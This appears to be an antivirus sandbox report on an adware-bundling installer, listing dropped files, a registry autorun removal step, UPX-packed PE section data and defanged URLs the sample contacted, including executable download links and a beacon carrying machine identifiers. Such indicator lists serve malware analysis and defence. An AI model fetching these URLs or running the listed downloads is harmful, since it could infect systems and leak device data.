%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ã§Â½â€˜Ã¥Ââ‚¬Ã¥Â¯Â¼Ã¨Ë†Âª.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã¥Â¿Â«Ã¦ÂÂ·Ã¥Â¯Â¼Ã¨Ë†Âª\Ã¦â€°â€œÃ¦Å ËœÃ§Â½â€˜Ã¨Â´Â.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\Ã¥â€¦Â¨Ã¥â€ºÂ½Ã¦Å“â‚¬Ã§Â»â„¢Ã¥Å â€ºÃ¥â€¦â€¦Ã¥â‚¬Â¼Ã¥Âºâ€”-Ã¦Â·ËœÃ¥Â®ÂÃ§Â½â€˜.url (46 bytes)
%Documents and Settings%\All Users\Desktop\Ã§Â½â€˜Ã¥Ââ‚¬Ã¥Â¯Â¼Ã¨Ë†Âª.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Ã¥â€¦Â¨Ã¥â€ºÂ½Ã¦Å“â‚¬Ã§Â»â„¢Ã¥Å â€ºÃ¥â€¦â€¦Ã¥â‚¬Â¼Ã¥Âºâ€”-Ã¦Â·ËœÃ¥Â®ÂÃ§Â½â€˜.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ã¦â€°â€œÃ¦Å ËœÃ§Â½â€˜Ã¨Â´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\Ã¦â€°â€œÃ¦Å ËœÃ§Â½â€˜Ã¨Â´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã¥Â¿Â«Ã¦ÂÂ·Ã¥Â¯Â¼Ã¨Ë†Âª\Ã§Â½â€˜Ã¥Ââ‚¬Ã¥Â¯Â¼Ã¨Ë†Âª.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
%Program Files%\xfplay\tools.exe (1530 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	1183744	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	1187840	20480	19968	5.41054	0437776d67d96306722fa79af85af88b
.rsrc	1208320	28672	25600	4.38322	f5640d017a00b32df01ad9febdbde008

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://ww.qianniannuan.com/1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5
hxxp://cdn.dh3.daicuo.com/u.php?id=89
hxxp://aq8.cc/?89-sd--ant-
hxxp://aq8.cc/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247
hxxp://aq8.cc/View/Home/Task/css.base.css?1.0.247
hxxp://aq8.cc/View/Home/Task/css.task.css?1.0.247
hxxp://aq8.cc/Public/html5shiv/3.7.2/html5shiv.min.js
hxxp://dc.cdn.daicuo.com/dc.base/1.0.3/css/base.min.css?1.0.247
hxxp://at.alicdn.com.danuoyi.alicdn.com/t/font_1415073294_4967172.eot?	188.254.86.250
hxxp://aq8.cc/Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot?
hxxp://aq8.cc/Public/respond/1.4.2/respond.min.js
hxxp://aq8.cc/Public/images/sns_qq.png
hxxp://aq8.cc/Public/jquery/1.11.3/jquery.min.js?1.0.247
hxxp://cdn.dh3.daicuo.com/tool/install.txt
hxxp://aq8.cc/Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247
hxxp://aq8.cc/View/Home/Task//base.js?1.0.247
hxxp://orp.n.shifen.com/query?cmd=url2finfo
hxxp://brwebapi.n.shifen.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe
hxxp://down.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe
hxxp://download.suxiazai.com.gls.acadn.com/for_down/2013/install1393485.exe	183.131.11.165
hxxp://mm.appkhh.com/mmliao/MM-liao8863.exe	122.227.42.227
hxxp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe
hxxp://js.users.51.la/17476535.js	113.107.42.34
hxxp://brdlsw.jomodns.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe
hxxp://orp.n.shifen.com/query?cmd=validurl
hxxp://e6845.dscb1.akamaiedge.net/pca3-g5.crl
hxxp://orp.n.shifen.com/commit?cmd=finfo
hxxp://e6845.dscb1.akamaiedge.net/CSC3-2010.crl
hxxp://opt.xdwscache.ourwebpic.com/Opendownloadernewxml.aspx?softlist=&lmarkid=88
hxxp://hk.mig.tencent-cloud.net/fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301
hxxp://opt.xdwscache.ourwebpic.com/temp/downloaderico/main.ico
hxxp://down.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe
hxxp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe
hxxp://opt.xdwscache.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://opt.xdwscache.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://1st.dl.ourdvs.com/ktv/9158chat2_ktv088_63070700.exe
hxxp://opt.xdwscache.ourwebpic.com/Downloaderconfig.aspx?imgtype=9158
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hxxp://imgcache.qq.com.cdngc.net/ptlogin/ver/10139/js/xui.js?v=10007	151.249.89.135
hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/icons.gif	151.249.89.135
hxxp://opt.xdwscache.ourwebpic.com/temp/flash/1.swf
hxxp://ui.ptlogin2.qq.com/cgi-bin/report?id=89217
hxxp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe	111.206.37.114
hxxp://crl.verisign.com/pca3-g5.crl	23.43.133.163
hxxp://imgcache.qq.com/ptlogin/ver/10139/js/xui.js?v=10007	151.249.89.135
hxxp://123.shipinbus.com/u.php?id=89	211.101.15.220
